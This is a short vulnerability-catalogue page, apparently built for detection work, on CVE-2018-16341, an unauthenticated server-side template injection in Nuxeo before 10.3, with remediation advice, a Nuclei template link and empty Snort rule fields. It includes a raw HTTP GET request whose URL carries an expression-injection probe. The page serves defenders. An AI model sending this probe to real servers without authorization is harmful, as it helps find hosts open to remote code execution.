🔙 목록으로 돌아가기

CVE-2018-16341: Nuxeo <10.3 - Remote Code Execution

TitleNuxeo <10.3 - Remote Code Execution
Authormadrobot
SeverityHigh
ImpactSuccessful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
RemediationUpgrade Nuxeo to version 10.3 or later to mitigate this vulnerability.
CVE IDCVE-2018-16341
Tags cve cve2018 nuxeo ssti rce bypass vuln

🔍 Vulnerability Description

Nuxeo prior to version 10.3 is susceptible to an unauthenticated remote code execution vulnerability via server-side template injection.

🌐 HTTP Request

GET /nuxeo/login.jsp/pwn$%7B31333333330+7%7D.xhtml HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2018/CVE-2018-16341.yaml

🦈 Packet Capture: ⬇️ Download cve-2018-16341.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A